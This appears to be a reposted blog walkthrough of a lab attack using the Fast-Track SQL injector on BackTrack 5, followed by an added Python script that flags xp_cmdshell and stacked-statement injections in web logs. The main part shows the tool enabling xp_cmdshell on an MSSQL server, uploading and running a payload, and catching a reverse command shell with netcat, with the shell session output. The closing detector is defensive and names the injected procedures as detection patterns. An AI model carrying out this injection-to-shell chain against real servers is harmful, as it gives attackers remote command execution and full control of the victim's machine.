SQL Injector - GET Manual Setup Binary Payload Attack
Source: Internet  Editor: 程序博客网  Time: 2024/06/06 08:39
Run on bt5:
```
*****************************************************************
**                                                             **
**  Fast-Track - A new beginning...                            **
**  Version: 4.0.2                                             **
**  Written by: David Kennedy (ReL1K)                          **
**  Lead Developer: Joey Furr (j0fer)                          **
**  http://www.secmaniac.com                                   **
**                                                             **
*****************************************************************

Enter which SQL Injector you want to use:

   1. SQL Injector - Query String Parameter Attack
   2. SQL Injector - POST Parameter Attack
   3. SQL Injector - GET FTP Payload Attack
   4. SQL Injector - GET Manual Setup Binary Payload Attack

   (q)uit

   Enter your choice: 4

*****************************************************************
**                                                             **
**  Fast-Track - A new beginning...                            **
**  Version: 4.0.2                                             **
**  Written by: David Kennedy (ReL1K)                          **
**  Lead Developer: Joey Furr (j0fer)                          **
**  http://www.secmaniac.com                                   **
**                                                             **
*****************************************************************

The manual portion allows you to customize your attack for whatever reason.

You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE

So for example, when the tool asks you for the SQL Injectable URL, type:

http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter

Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah

<ctrl>-c to exit to Main Menu...

Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
Enter the IP Address of server with NetCat Listening: 192.168.1.11
Enter Port number with NetCat listening: 9090

Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload....
Sending second portion of payload....
Sending next portion of payload...
Sending the last portion of the payload...
Running cleanup...
Running the payload on the server...
```
Running nc in a separate bash session yielded the reverse cmdshell:
```
root@bt:~# nc -l -p 9090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-07-02  21:45    <DIR>          msf3
2012-08-07  03:10       176,204,554 msf3.zip
2004-12-29  13:07            61,440 nc.exe
2013-07-01  22:45    <DIR>          Program Files
2013-05-01  22:15        16,232,448 python-2.7.4.msi
2013-07-06  17:57    <DIR>          Python27
2013-04-07  21:03        70,402,968 SQL2000SP4.exe
2013-06-30  21:58    <DIR>          SQL2KSP4
2013-06-30  21:53    <DIR>          SQLEVAL
2011-03-22  17:38       349,280,992 sqleval.exe
2013-07-01  20:52    <DIR>          WINDOWS
2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe
               8 个文件    633,051,106 字节
               7 个目录  3,908,493,312 可用字节

C:\>exit
exit
root@bt:~#
```
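From the web server's side, the run above shows up as a burst of GET requests to one parameter, the first of which touches xp_cmdshell. The following is an added detection example, not part of the original post or of Fast-Track: it decodes query strings from access-log lines and flags those tokens. The log format, the rule set and the sample lines are assumptions, since the page does not show the tool's actual requests.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined-log style; hosts and paths mirror the
# lab session above, the payload text is a placeholder, not captured traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [06/Jul/2013:17:50:01 +0800] "GET /mssql2k/login?username=alice HTTP/1.1" 200 412
192.168.1.11 - - [06/Jul/2013:17:55:10 +0800] "GET /mssql2k/login?username=%27%3Bexec+master..xp_cmdshell+%27PLACEHOLDER%27-- HTTP/1.1" 200 412
192.168.1.11 - - [06/Jul/2013:17:55:11 +0800] "GET /mssql2k/login?username=%27%3BEXEC%20sp_configure%20%27PLACEHOLDER%27-- HTTP/1.1" 200 412
192.168.1.50 - - [06/Jul/2013:17:56:00 +0800] "GET /mssql2k/help?topic=o%27brien HTTP/1.1" 200 90
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumed rule set: MSSQL procedure names plus a quote followed by a stacked statement.
RULES = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
    "stacked_statement": re.compile(r"['\")]\s*;\s*(exec|execute|declare)\b", re.I),
}

def scan(log_text):
    """Return (client_ip, parameter, rule_name) for every suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl percent-decodes values and turns '+' into spaces, so
        # encoded payloads are matched in their decoded form.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    hits.append((ip, name, rule))
    return hits

def hits_per_client(hits):
    """Count findings per source IP; repeated hits suggest a staged upload."""
    return Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A lone apostrophe such as `o'brien` is not flagged; only the procedure names or a quote followed by a stacked `exec`/`declare` trigger a finding.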